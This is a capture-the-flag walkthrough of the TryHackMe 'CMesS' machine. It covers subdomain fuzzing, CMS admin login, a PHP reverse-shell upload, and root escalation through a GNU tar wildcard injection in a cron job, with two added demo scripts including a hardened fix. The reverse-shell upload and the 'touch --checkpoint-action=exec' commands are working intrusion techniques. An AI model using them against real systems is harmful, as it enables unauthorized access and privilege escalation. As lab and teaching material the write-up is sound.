CMesS
Before starting enumeration, the first thing to do is add the IP of the THM box to the /etc/hosts file. We map it to the name "cmess.thm".
User flag
Let's start enumerating with a basic nmap scan:
nmap -T4 -A -p- cmess.thm

There are only two open ports, 22 (SSH) and 80 (HTTP). Let's go after port 80 first.
Browsing to the site, there's not much on it.

Checking the robots.txt file basically gives us nothing: it lists a few disallowed paths, but we don't have permission to see what's in those folders.


Let's try a bit of brute forcing with gobuster to see whether there's any interesting directory on the website.

Gobuster gives us a bunch of directories, but after checking a few of them we see it's a dead end. So what else can we do? We can try fuzzing for subdomains (virtual hosts) with wfuzz, sending each candidate name in the Host header:
wfuzz -c -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

We get a lot of 200 responses: the server answers every Host name with the same default page, so the status code alone tells us nothing. In the screenshot we can already see the "dev" subdomain has a different word length, so that one is probably not a false positive. I didn't see that at the time, so I had to run the following command with the --hw flag, which hides every response with 290 words (the length of the default page):
wfuzz -c --hw 290 -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
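The filtering step above (hide the baseline word count, keep the outlier) is easy to automate. The script below is an added example and not part of the original write-up: it sends each wordlist entry as a Host header, records the word count of the reply, and hides whichever count occurs most often, which is what --hw 290 did once the baseline was known. The fetch_words_fake function and its word counts (290 for the catch-all page, 107 for dev) are constructed so the script runs offline; swap in fetch_words_curl against a real target.

```shell
#!/bin/sh
# Added example, not from the original write-up: a minimal virtual-host
# fuzzer reproducing the wfuzz run above, including the "hide the baseline
# word count" step that --hw 290 does once you know the baseline.
# Assumptions: curl is installed when used against a live target; the fake
# fetcher and its word counts below are constructed for offline use.

# fetch_words_curl HOST BASE: word count of the response when the Host
# header is HOST and the request goes to http://BASE/.
fetch_words_curl() {
    curl -s -m 5 -H "Host: $1" "http://$2/" | wc -w | tr -d ' '
}

# Constructed stand-in for curl so the script runs offline: every vhost
# returns the 290-word catch-all page except dev, which returns 107 words.
fetch_words_fake() {
    case "$1" in
        dev.*) echo 107 ;;
        *)     echo 290 ;;
    esac
}

# vhost_fuzz BASE WORDLIST [FETCHER]
# Prints the hosts whose response word count differs from the most common
# one. A catch-all vhost answers 200 for every name, so the status code is
# useless; the odd length out is the real subdomain.
vhost_fuzz() {
    base="$1"
    wordlist="$2"
    fetcher="${3:-fetch_words_curl}"
    results=$(mktemp)
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        host="$word.$base"
        printf '%s %s\n' "$("$fetcher" "$host" "$base")" "$host"
    done < "$wordlist" > "$results"
    # Baseline = the word count seen most often (the value you'd pass to --hw).
    baseline=$(awk '{print $1}' "$results" | sort | uniq -c | sort -rn | awk 'NR==1 {print $2}')
    awk -v b="$baseline" '$1 != b {print $2}' "$results"
    rm -f "$results"
}

# Demo with a constructed wordlist and the fake fetcher; drop the third
# argument (or pass fetch_words_curl) to run against a live target.
demo_vhost_fuzz() {
    wl=$(mktemp)
    printf '%s\n' www mail dev ftp admin test > "$wl"
    vhost_fuzz cmess.thm "$wl" fetch_words_fake
    rm -f "$wl"
}

demo_vhost_fuzz
```

Against a real target the baseline is computed from the responses themselves, so you don't have to read the word count off a screenshot first; the one caveat is that a wordlist with several real vhosts of identical size would still show them, while a site whose default page varies per request (timestamps, CSRF tokens) needs a looser measure than an exact word count.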

We got a subdomain, dev.cmess.thm. Let's add it to /etc/hosts as well and see what's in there.

It looks like we found a password, so let's try to log in at the /admin/ page.

Bingo! We're in. Moving around, we find we can upload files, so let's try to upload a shell: Content > File Manager > Upload.

We can upload a PHP reverse shell successfully (this is the one I used: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). Remember to set the $ip and $port variables at the top of that script to your listener before uploading it.
As we can see, the shell is saved under the assets folder, so browse to http://cmess.thm/assets/php_reverse_shell.php (don't forget to start a listener on that port first).

Noice. We're in. Let's upgrade the shell.

After a few minutes of manual enumeration I couldn't really find anything interesting, so I used linpeas to show me the right way.

That /opt/.password.bak looks promising... and it really is: it gives us the password for the "andre" user. Switch to the "andre" user and grab the user.txt flag.
Root flag
After a while of manual enumeration we find something pretty interesting in the crontab file: a job that runs as root and archives the /home/andre/backup folder with tar using a wildcard.

As we can see, there's a wildcard vulnerability in there: the shell expands the unquoted * into the file names in that folder, and GNU tar parses any resulting argument that starts with -- as an option, so file names become options. Let's exploit it.
Go to the /home/andre/backup folder, create a privesc.sh containing whatever you want root to execute (for example a reverse shell back to a listener on your machine), and do the following:

chmod +x privesc.sh
touch /home/andre/backup/--checkpoint=1
touch /home/andre/backup/--checkpoint-action=exec='sh privesc.sh'
Now wait for the next run of the cron job...
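To see exactly why the two touch commands above work, and what the fix looks like, here is an added example that is not part of the original write-up. It rebuilds the backup folder in a scratch directory as the current user, runs the cron-style tar command once with the bare wildcard and once with -- before it, and reports whether the payload fired. The payload only drops a marker file, and the assumptions are GNU tar (busybox tar has no --checkpoint) and that -z is left out only to avoid needing gzip.

```shell
#!/bin/sh
# Added example, not from the original write-up: reproduces the GNU tar
# wildcard injection in a scratch directory as the current user, then shows
# the one-argument fix. Assumptions: GNU tar (busybox tar has no
# --checkpoint); -z is dropped only to avoid needing gzip. The payload just
# drops a marker file instead of handing out a root shell.

# setup_backup_dir DIR: recreate DIR like /home/andre/backup with the
# payload script plus the two file names that tar will read as options.
setup_backup_dir() {
    rm -rf "$1"
    mkdir -p "$1"
    # Payload: on the box this is where a reverse shell or SUID copy goes.
    printf '%s\n' '#!/bin/sh' 'touch pwned' > "$1/privesc.sh"
    chmod +x "$1/privesc.sh"
    touch "$1/--checkpoint=1"
    touch "$1/--checkpoint-action=exec=sh privesc.sh"
}

# run_backup DIR vulnerable|hardened: run the cron-style job from inside
# DIR and print "fired" if the payload executed, "not fired" otherwise.
run_backup() {
    dir="$1"
    mode="$2"
    rm -f "$dir/pwned"
    if [ "$mode" = hardened ]; then
        # '--' ends option parsing, so the crafted names are archived as
        # ordinary files and never interpreted.
        (cd "$dir" && tar -cf "$dir.tar" -- *) >/dev/null 2>&1 || true
    else
        # Unquoted * expands to the file names, which tar then parses as
        # --checkpoint=1 --checkpoint-action=exec='sh privesc.sh'.
        (cd "$dir" && tar -cf "$dir.tar" *) >/dev/null 2>&1 || true
    fi
    if [ -f "$dir/pwned" ]; then echo fired; else echo "not fired"; fi
}

demo_tar_wildcard() {
    work=$(mktemp -d)
    setup_backup_dir "$work/backup"
    printf 'vulnerable job: %s\n' "$(run_backup "$work/backup" vulnerable)"
    setup_backup_dir "$work/backup"
    printf 'hardened job:   %s\n' "$(run_backup "$work/backup" hardened)"
    rm -rf "$work"
}

demo_tar_wildcard
```

The --checkpoint=1 file makes tar run its checkpoint action after the first record, and the --checkpoint-action=exec=... file names the command to run, so even a three-file archive triggers it. Other tar-specific file names (-T, --rsh-command) work the same way, and the general defence is the same as in the hardened branch: never let a glob expand into a privileged command line unprotected, either by putting -- first or by archiving a fixed path such as tar -C /home/andre/backup -cf ... .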

HABEMUS ROOT SHELL.